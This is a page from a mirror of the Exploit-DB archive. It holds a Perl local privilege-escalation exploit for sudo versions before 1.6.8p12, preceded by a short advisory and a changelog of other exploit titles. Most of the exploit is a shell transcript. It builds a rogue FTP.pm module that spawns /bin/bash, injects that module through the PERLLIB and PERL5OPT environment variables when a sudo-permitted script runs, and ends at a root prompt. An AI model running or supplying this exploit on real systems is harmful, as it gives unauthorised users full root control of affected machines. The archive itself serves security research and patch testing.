bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/27056.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

132 lines
No EOL
3.4 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/16184/info
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability).
## Sudo local root exploit ##
## vuln versions : sudo < 1.6.8p12
## adv : https://www.securityfocus.com/bid/15394
## adv : http://www.frsirt.com/bulletins/2642
##by breno - breno@kalangolinux.org
## You need execute access to perl script in sudo ##
## cat /etc/sudoers ##
breno ALL=(ALL) /home/breno/code.pl
## Now let's create your own perl module FTP.pm :) good name.
breno ~ $ -> mkdir modules
breno ~ $ -> mkdir FTP
breno ~/modules $ -> ls
FTP
breno ~/modules $ -> cd FTP
breno ~/modules/FTP $ -> h2xs -AXc -n FTP
Defaulting to backwards compatibility with perl 5.8.7
If you intend this module to be compatible with earlier perl versions, please
specify a minimum perl version with the -b option.
Writing FTP/lib/FTP.pm
Writing FTP/Makefile.PL
Writing FTP/README
Writing FTP/t/FTP.t
Writing FTP/Changes
Writing FTP/MANIFEST
breno ~/modules/FTP $ ->
breno ~/modules/FTP/FTP $ -> perl Makefile.PL
Checking if your kit is complete...
Looks good
Writing Makefile for FTP
breno ~/modules/FTP/FTP $ -> make
cp lib/FTP.pm blib/lib/FTP.pm
Manifying blib/man3/FTP.3pm
breno ~/modules/FTP/FTP $ -> make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0,
'blib/lib', 'blib/arch')" t/*.t
t/FTP....ok
All tests successful.
Files=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)
breno ~/modules/FTP/FTP $ ->
#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module
breno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm
package FTP;
use strict;
use vars qw($VERSION);
$VERSION = '0.01';
sub new {
my $package = shift;
return bless({}, $package);
}
sub verbose {
my $self = shift;
system("/bin/bash");
if (@_) {
$self->{'verbose'} = shift;
}
return $self->{'verbose'};
}
sub hoot {
my $self = shift;
return "Don't pollute!" if $self->{'verbose'};
return;
}
1;
__END__
EOF
# Remenber our super code.pl
breno ~ $ -> vi code.pl
#!/usr/bin/perl
BEGIN { $| = 1; print "1..1\n"; }
END {print "not ok 1\n" unless $loaded;}
use FTP;
$loaded = 1;
print "ok 1\n";
my $obj = new FTP;
$obj->verbose(1);
my $result = $obj->hoot;
print ($result eq "Don't pollute!" ? "ok 2\n" : "not ok 2\n");
$obj->verbose(0);
my $result = $obj->hoot;
print ($result eq "" ? "ok 3\n" : "not ok 3\n");
EOF
# Now let's play with PERLLIB and PERL5OPT env.
breno ~ $ -> export PERLLIB="/home/breno/modules/FTP/FTP/blib/lib/"
breno ~ $ -> export PERL5OPT="-MFTP"
# Now get Root!! :)
breno ~ $ -> sudo ./code.pl
Password:
1..1
ok 1
root ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root ~ # ->
Reference in a new issue View git blame Copy permalink